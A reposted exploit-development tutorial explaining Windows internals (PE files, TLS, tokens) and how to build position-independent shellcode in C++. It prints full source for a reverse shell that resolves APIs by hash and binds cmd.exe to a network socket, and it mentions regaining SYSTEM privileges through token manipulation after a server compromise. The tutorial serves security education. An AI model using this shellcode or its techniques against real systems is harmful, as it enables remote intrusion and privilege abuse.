Reposted

Exploit Development Tutorial Series: Windows Basics & Shellcode

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

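Windows Basics

0x00 Windows Basics

This article briefly covers some basics that Windows developers should know.

0x01 Win32 API

The main Windows API is provided by several DLLs (Dynamic Link Libraries). An application can import functions from those DLLs and call them. Because applications go through these documented functions, the internals of Windows can change from one version to the next without breaking the portability of ordinary user-mode applications.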

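0x02 PE file format

Executables and DLLs are both PE (Portable Executable) files. Each PE contains an import table and an export table. The import table lists the imported functions and the files (modules) they come from. The export table lists the exported functions, that is, the functions that other PE files can import.

PE files are made up of several sections (code, data, and so on). The .reloc section holds the information needed to relocate the executable or DLL in memory. Some addresses in code are relative (for example, the targets of relative jmp instructions), but many are absolute and depend on where the module is loaded in memory.

The Windows loader searches the application's own directory before the system directory (\windows\system32), so an application can ship with a DLL that differs from the system's copy. The resulting versioning problems (incompatibilities) are what some people call DLL-hell.

It is important to understand the concept of the Relative Virtual Address (RVA). PE files use RVAs to specify the positions of elements relative to the base address of the module. In other words, if a module is loaded at address B (the base address) and an element has RVA X within that module, then the element's Virtual Address (VA) is B+X.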
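The B+X relationship can be sketched in a few lines of Python. This is only an illustration: the function names `rva_to_va` and `va_to_rva` and the sample addresses are assumptions made up for this example, not part of any Windows API.

```python
def rva_to_va(base_address, rva):
    """Return the virtual address of an element, given the module base (B) and its RVA (X)."""
    return base_address + rva


def va_to_rva(base_address, va):
    """Inverse operation: recover the RVA from a virtual address inside the module."""
    if va < base_address:
        raise ValueError("address lies below the module base")
    return va - base_address


if __name__ == "__main__":
    base = 0x10000000          # hypothetical load address of a module
    print(hex(rva_to_va(base, 0x1234)))
    print(hex(va_to_rva(base, 0x10001234)))
```

The same arithmetic applies no matter where the loader places the module, which is why PE structures store RVAs rather than absolute addresses.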

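0x03 Threads

If you are used to Windows, the concept of threads will be familiar. If you come from Linux, keep in mind that Windows gives CPU time slices to threads. You can create new processes with CreateProcess() and new threads with CreateThread(). Threads execute within the address space of the process they belong to, so they share memory.

Threads also have limited support for non-shared memory through a mechanism called TLS (Thread Local Storage).

Basically, the TEB of each thread contains a main TLS array of 64 DWORDs, plus an optional TLS array of up to 1024 DWORDs that is allocated when the main array runs out of free entries. First, an index corresponding to a position in one of the two arrays must be allocated with TlsAlloc(), which returns the allocated index. Each thread can then read the DWORD at that index with TlsGetValue(index) and write it with TlsSetValue(index, newValue). For example, TlsGetValue(7) reads the DWORD at index 7 of the main TLS array in the TEB of the current thread.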
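The idea of a slot that every thread can name but that holds a separate value per thread can be illustrated with Python's `threading.local`. This is only an analogy for the Win32 calls mentioned above, not a wrapper around them; the names `tls`, `worker` and `run_demo` are made up for this sketch.

```python
import threading

tls = threading.local()          # stands in for one allocated TLS index
barrier = threading.Barrier(2)   # makes both threads write before either reads


def worker(thread_name, results):
    tls.value = thread_name            # comparable to TlsSetValue(index, value)
    barrier.wait()                     # by now the other thread has written too
    results[thread_name] = tls.value   # comparable to TlsGetValue(index)


def run_demo():
    results = {}
    threads = [threading.Thread(target=worker, args=(name, results))
               for name in ("first", "second")]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


if __name__ == "__main__":
    print(run_demo())
```

Each thread reads back its own value even though both wrote to the same name before either one read, which is the property TLS provides.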

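Note: we could emulate this mechanism by using GetCurrentThreadId(), but it would not be as efficient.

0x04 Tokens

Tokens represent access rights. Like file handles, tokens are just 32-bit integers. Each process maintains an internal structure that holds the access-rights information associated with its tokens.

There are two types of tokens: primary tokens and impersonation tokens. Whenever a process is created, it is assigned a primary token. Each thread of that process can have the token of the process, or an impersonation token obtained from another process. If LogonUser() is called with valid credentials, it returns an impersonation token, which cannot be used with CreateProcessAsUser() unless you call DuplicateTokenEx() to convert it into a primary token.

A token can be attached to the current thread with SetThreadToken(newToken) and removed with RevertToSelf(), which makes the thread revert to the primary token.

Consider a user who connects to a server on Windows and sends a username and password. The server, running as SYSTEM, calls LogonUser() with the supplied credentials and, if it succeeds, gets back a new token. The server then creates a new thread, which calls SetThreadToken(new_token), where new_token is the token returned by LogonUser(). From then on, the thread runs with the same privileges as the user. When the thread has finished serving the client, it is either destroyed or it calls RevertToSelf() and is added to the pool of free threads.

If you can take control of the server, you can regain SYSTEM privileges for the current thread by calling RevertToSelf(), or by looking for other tokens in memory and attaching them to the current thread with SetThreadToken().

Keep in mind that CreateProcess() uses the primary token as the token of the new process. This is a problem when the thread calling CreateProcess() has an impersonation token with more privileges than the primary token: the new process will have fewer privileges than the thread that created it.

The solution is to create a new primary token from the impersonation token of the current thread with DuplicateTokenEx(), and then to create the new process by calling CreateProcessAsUser() with the new primary token.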

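Shellcode

0x00 Introduction

Shellcode is a piece of code that an exploit sends as its payload; it is injected into the vulnerable application and executed there. Shellcode must be self-contained and should not contain null bytes. It is usually copied by functions such as strcpy(), which stop copying when they encounter a null byte, so a shellcode containing one would be copied only in part. Shellcode is usually written directly in assembly, but in this article we will develop it in C/C++ with Visual Studio 2013. The benefits of doing so are:

1. Shorter development time.

2. IntelliSense.

3. Easier debugging.

We will use VS 2013 to produce an executable that contains the shellcode, and a Python script to extract the shellcode and fix it up (that is, remove its null bytes).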
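To see why null bytes matter, here is a small Python model of what a strcpy()-style copy does to a payload. The helper `c_strcpy` is a made-up name for this sketch; the sample bytes are the push/call encoding that appears later in this article, followed by two filler bytes.

```python
def c_strcpy(src):
    """Model strcpy(): copy bytes up to, but not including, the first null byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


if __name__ == "__main__":
    # 6A 64             push 64h
    # FF 15 90 20 19 00 call dword ptr ds:[192090h]
    # 90 90             filler
    payload = bytes.fromhex("6a64ff159020190090 90".replace(" ", ""))
    copied = c_strcpy(payload)
    print(len(payload), len(copied))
```

The absolute address 00192090h contributes a zero byte, so everything after it would be lost in the copy.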

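0x01 C/C++ code

Use only stack variables

To write position independent code, we must use only stack variables. This means that we cannot write

char *v = new char[100];

because that array would be allocated on the heap. What is more, this would try to call the new function in msvcr120.dll through an absolute address:

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

The location 192090h contains the address of the function. If we want to call a function imported from a library, we must do so directly, without relying on the import table and the Windows loader. Another problem is that the new operator probably needs some kind of initialization performed by the C/C++ runtime.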

We cannot use global variables either:

int x;

int main() {
  x = 12;
}

The code above (if it is not optimized away) produces:

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

8E9130h is the absolute address of the variable x.

Strings are a problem too. If we write

char str[] = "I'm a string";
printf(str);

the string is placed in the .rdata section of the executable and referenced through an absolute address.

You must not use printf in your shellcode: this is only an example to show how str is referenced.

Here is the asm code:

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

As you can see, the string is located at address A72100h in the .rdata section and is copied onto the stack (str points to the stack) by the movsd and movsb instructions. Note that A72100h is an absolute address. This code is clearly not position independent.

If we write

char *str = "I'm a string";
printf(str);

the string is still placed in the .rdata section, but it is not copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The string is in the .rdata section at the absolute address A32100h.

How can we make this code position independent?

The simpler (partial) solution is this:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

Here is the corresponding asm code:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

Except for the call to printf, this code is position independent, because the pieces of the string are encoded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.
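The immediates in that listing are simply the bytes of the string read as little-endian integers. The following Python sketch reproduces them; `string_to_mov_immediates` is a hypothetical helper written for this illustration, and the way it splits the tail into word and byte pieces is an assumption about what a compiler might do, not a description of the actual code generator.

```python
import struct


def string_to_mov_immediates(text):
    """Split a null-terminated ASCII string into (size, value) pieces,
    widest first, each value read as a little-endian integer."""
    data = text.encode("ascii") + b"\x00"
    pieces = []
    offset = 0
    for size, fmt in ((4, "<I"), (2, "<H"), (1, "<B")):
        while len(data) - offset >= size:
            (value,) = struct.unpack_from(fmt, data, offset)
            pieces.append((size, value))
            offset += size
    return pieces


if __name__ == "__main__":
    for size, value in string_to_mov_immediates("I'm a string"):
        print(size, hex(value))
```

For "I'm a string" this yields the three dwords 206D2749h, 74732061h and 676E6972h seen in the listing, followed by the single terminating zero byte.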

Unfortunately, this approach stops working once the string reaches a certain length. The code

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

produces

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

As you can see, part of the string is located in the .rdata section at address 13E2100h, while the rest is encoded in the source operands of the mov instructions as before.

The solution I came up with is to allow code like

char *str = "I'm a very long string";

and to fix the shellcode with a Python script. The script needs to extract the referenced strings from the .rdata section, put them into the shellcode and fix the relocations. We will see how shortly.

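Do not call the Windows API directly

In our C/C++ code we cannot write

WaitForSingleObject(procInfo.hProcess, INFINITE);

because "WaitForSingleObject" would have to be imported from kernel32.dll.

In a nutshell, a PE file contains an import table and an import address table (IAT). The import table says which functions to import from which libraries. The IAT is filled in by the Windows loader when the executable is loaded, and contains the addresses of the imported functions. The code of the executable calls the imported functions through one level of indirection. For example:

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

The address 1D2094h is the location of the entry (in the IAT) that contains the address of the function MessageBoxA. This indirection is useful because the call above does not need to be fixed (unless the executable is relocated). The only thing the Windows loader has to fix is the dword at 1D2094h, which is the address of MessageBoxA.

The solution is to get the addresses of the Windows functions directly from the in-memory data structures of Windows. We will see how later.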

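Creating a new project

Go to File→New→Project…, select Installed→Templates→Visual C++→Win32→Win32 Console Application, choose a name for the project (I called it shellcode) and click OK.

Go to Project→<project name> properties and a new dialog will appear. Apply the changes to all configurations (Release and Debug) by setting Configuration (top left of the dialog) to All Configurations. Then expand Configuration Properties and, under General, change Platform Toolset to Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013).

This lets you use some features of C++11 and C++14, such as static_assert.

Shellcode example

Here is the code for a simple reverse shell (definition). Add a file named shellcode.cpp to the project and copy this code into it. Do not try to understand all of it right now; we will discuss it at length later.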

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".

#include <WinSock2.h>               // must precede #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>

#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}

LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}

// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;

        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);

        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);

    return NULL;            // address not found
}

#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498

#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;

    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.

    DefineFuncPtr(LoadLibraryA);

    My_LoadLibraryA("ws2_32.dll");

    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);

    const char *hostName = "127.0.0.1";
    const int hostPort = 123;

    WSADATA wsaData;

    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;

    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);

    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;

    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);

__end:
    My_ExitThread(0);

    return 0;
}

int main() {
    return entryPoint();
}

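Compiler configuration

Go to Project→<project name> properties, expand Configuration Properties and then C/C++. Apply the changes to the Release configuration.

Here are the settings you need to change:

General:
- SDL Checks: No (/sdl-)

This may not be needed, but I disabled them anyway.

Optimization:
- Optimization: Minimize Size (/O1)

This is very important! We want the shellcode to be as small as possible.

- Inline Function Expansion: Only __inline (/Ob1)

With this setting we tell VS 2013 to inline only the functions declared with _inline. main() just calls the entryPoint function of the shellcode. If entryPoint is short, it might be inlined into main(). That would be disastrous, because main() would no longer mark the end of the shellcode (in fact, it would contain part of it). We will see why later.

- Enable Intrinsic Functions: Yes (/Oi)

I do not know whether this setting should be disabled.

- Favor Size Or Speed: Favor small code (/Os)
- Whole Program Optimization: Yes (/GL)

Code Generation:
- Security Check: Disable Security Check (/GS-)

We do not need any security checks!

- Enable Function-Level linking: Yes (/Gy)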

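Linker configuration

Go to Project→<project name> properties, expand Configuration Properties and then Linker. Apply the changes to the Release configuration. Here are the relevant settings you need to change:

General:
- Enable Incremental Linking: No (/INCREMENTAL:NO)

Debugging:
- Generate Map File: Yes (/MAP)

This tells the linker to generate a map file describing the structure of the EXE.

- Map File Name: mapfile

This is the name of the map file. Choose whatever name you like.

Optimization:
- References: Yes (/OPT:REF)

This option is very important for producing a small shellcode, because it eliminates functions and data that are never referenced by the code.

- Enable COMDAT Folding: Yes (/OPT:ICF)
- Function Order: function_order.txt

With this setting the linker reads a file named function_order.txt, which specifies the order in which functions must appear in the code section. We want entryPoint to be the first function in the code section, so function_order.txt contains a single line with the string ?entryPoint@@YAHXZ. You can find the function names in the map file.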

getProcAddrByHash

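This function returns the address of a function exported by a module (.exe or .dll) present in memory, given the hash associated with the module and the function. It is certainly possible to look functions up by name, but that would waste space, because the names would have to be included in the shellcode. A hash, on the other hand, is only 4 bytes. Since we do not use two hashes (one for the module and one for the function), getProcAddrByHash has to consider every module loaded in memory.

The hash for MessageBoxA, which is exported by user32.dll, can be computed as follows:

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

The result is the sum of getHash("user32.dll") and getHash("MessageBoxA"). The implementation of getHash is straightforward:

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}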
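For experimenting with hash values outside the C++ project, the same computation can be mirrored in Python. This is a sketch, assuming ASCII input; the names `get_hash` and `get_function_hash` are Python renderings chosen for this example, and the explicit masking with 0xFFFFFFFF stands in for the 32-bit wraparound that DWORD arithmetic gives for free in C.

```python
MASK32 = 0xFFFFFFFF


def ror13(value):
    """Rotate a 32-bit value right by 13 bits."""
    return ((value >> 13) | (value << (32 - 13))) & MASK32


def get_hash(text):
    """Mirror of getHash(): rotate, then add the character with 32 subtracted
    when its code is >= 'a' (which uppercases ASCII letters)."""
    h = 0
    for ch in text:
        code = ord(ch)
        h = ror13(h)
        h = (h + (code - 32 if code >= ord("a") else code)) & MASK32
    return h


def get_function_hash(module_name, function_name):
    """Mirror of getFunctionHash(): 32-bit sum of the two hashes."""
    return (get_hash(module_name) + get_hash(function_name)) & MASK32


if __name__ == "__main__":
    print("0x%08x" % get_function_hash("user32.dll", "MessageBoxA"))
```

Because lowercase letters are folded to uppercase before being added, "user32.dll" and "USER32.DLL" hash to the same value.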

As you can see, the hash is case-insensitive. This matters because in some versions of Windows the names in memory are all uppercase. First, getProcAddrByHash obtains the address of the PEB by way of the TEB (Thread Environment Block):

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

The selector fs is associated with a segment that starts at the address of the TEB. At offset 30h, the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg:

0:000> dt _TEB @$teb
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x01c EnvironmentPointer : (null)
   +0x020 ClientId         : _CLIENT_ID
   +0x028 ActiveRpcHandle  : (null)
   +0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
   +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
   +0x034 LastErrorValue   : 0
   +0x038 CountOfOwnedCriticalSections : 0
   +0x03c CsrClientThread  : (null)
   <snip>

The PEB is associated with the current process and contains, among other things, information about the modules loaded into the process address space. Here is getProcAddrByHash again:

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);

    return NULL;            // address not found
}

Here is part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch there is a field called Ldr, which is a pointer to a PEB_LDR_DATA structure. Let's look at it in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList is a doubly linked list of LDR_DATA_TABLE_ENTRY structures, one for each module loaded in the address space of the current process. To be precise, InMemoryOrderModuleList is a LIST_ENTRY, which contains two fields:

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

Flink is the forward link and Blink the backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly:

Flink points to a LIST_ENTRY structure contained inside the LDR_DATA_TABLE_ENTRY structure.

Let's see how LDR_DATA_TABLE_ENTRY is defined:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase          : Ptr32 Void
   +0x01c EntryPoint       : Ptr32 Void
   +0x020 SizeOfImage      : Uint4B
   +0x024 FullDllName      : _UNICODE_STRING
   +0x02c BaseDllName      : _UNICODE_STRING
   +0x034 Flags            : Uint4B
   +0x038 LoadCount        : Uint2B
   +0x03a TlsIndex         : Uint2B
   +0x03c HashLinks        : _LIST_ENTRY
   +0x03c SectionPointer   : Ptr32 Void
   +0x040 CheckSum         : Uint4B
   +0x044 TimeDateStamp    : Uint4B
   +0x044 LoadedImports    : Ptr32 Void
   +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : Ptr32 Void
   +0x050 ForwarderLinks   : _LIST_ENTRY
   +0x058 ServiceTagLinks  : _LIST_ENTRY
   +0x060 StaticLinks      : _LIST_ENTRY
   +0x068 ContextInformation : Ptr32 Void
   +0x06c OriginalBase     : Uint4B
   +0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks, which is at offset 8, so we must subtract 8 to get the address of the _LDR_DATA_TABLE_ENTRY.

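First, we get the Flink pointer. Since getProcAddrByHash walks InMemoryOrderModuleList, the relevant line is:

+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]

Its value is 0x683088, so the _LDR_DATA_TABLE_ENTRY structure starts at 0x683088 – 8 = 0x683080. This agrees with the Flink of InLoadOrderModuleList (0x683080), since InLoadOrderLinks sits at offset 0. The dump below was taken at 0x683078 (the InLoadOrderModuleList value minus 8), which is 8 bytes too early, so every value appears 8 bytes further down than the field it belongs to: the 0x60000 shown under SizeOfImage is really DllBase (it matches ImageBaseAddress in the PEB), and the path shown under BaseDllName is really FullDllName.

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮ｍ쿟ﾹ엘ﾬ膪ｎ???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

As you can see, I am debugging calc.exe in WinDbg! That's right: the first module is the executable itself. The important field is DllBase. Given the base address of a module, we can analyze the PE file loaded in memory and get all kinds of information, such as the addresses of the exported functions. This is what we do in getProcAddrByHash: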
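The "subtract the field offset" step that getDataTableEntry performs with offsetof can be checked with Python's ctypes. This is a sketch under stated assumptions: the structures below are simplified 32-bit stand-ins that declare only the first few fields of the WinDbg layout shown earlier, and the class and function names are made up for this example.

```python
import ctypes


class LIST_ENTRY32(ctypes.Structure):
    # 32-bit layout: two 4-byte pointers, stored here as plain integers
    _fields_ = [("Flink", ctypes.c_uint32),
                ("Blink", ctypes.c_uint32)]


class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # Only the leading fields are declared; that is enough for the offsets we need.
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY32),
                ("InMemoryOrderLinks", LIST_ENTRY32),
                ("InInitializationOrderLinks", LIST_ENTRY32),
                ("DllBase", ctypes.c_uint32)]


def entry_from_memory_order_link(link_address):
    """Given the address of an InMemoryOrderLinks field, return the address
    of the structure that contains it (the offsetof trick)."""
    return link_address - LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset


if __name__ == "__main__":
    flink = 0x683088   # InMemoryOrderModuleList Flink from the _PEB_LDR_DATA dump
    print(hex(entry_from_memory_order_link(flink)))
```

With the Flink value 0x683088 taken from the _PEB_LDR_DATA dump, the containing structure starts at 0x683080, and DllBase lives 0x18 bytes after that.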

        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
